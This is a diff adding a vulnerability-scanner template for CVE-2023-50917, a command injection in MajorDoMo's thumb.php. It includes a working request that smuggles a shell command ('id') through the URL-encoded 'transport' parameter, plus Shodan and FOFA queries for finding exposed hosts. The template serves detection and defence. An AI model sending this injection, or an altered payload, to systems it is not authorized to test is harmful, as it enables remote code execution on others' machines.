diff --git a/http/cves/2023/CVE-2023-50917.yaml b/http/cves/2023/CVE-2023-50917.yaml new file mode 100644 index 0000000000..a95a6d88d0 --- /dev/null +++ b/http/cves/2023/CVE-2023-50917.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-50917 + +info: + name: MajorDoMo thumb.php - OS Command Injection + author: DhiyaneshDK + severity: critical + description: "MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager." + reference: + - http://packetstormsecurity.com/files/176273/MajorDoMo-Remote-Code-Execution.html + - http://seclists.org/fulldisclosure/2023/Dec/19 + - https://github.com/sergejey/majordomo/commit/0662e5ebfb133445ff6154b69c61019357092178 + - https://github.com/sergejey/majordomo/commit/3ec3ffb863ea3c2661ab27d398776c551f4daaac + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-50917 + cwe-id: CWE-77 + epss-score: 0.00104 + epss-percentile: 0.41924 + cpe: cpe:2.3:a:mjdm:majordomo:*:*:*:*:*:*:*:* + metadata: + vendor: mjdm + product: majordomo + shodan-query: http.favicon.hash:1903390397 + fofa-query: app="MajordomoSL" + tags: packetstorm,seclists,cve,cve2023,majordomo,rce + +http: + - method: GET + path: + - "{{BaseURL}}/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + - 'rtsp_transport' + condition: and + + - type: status + status: + - 200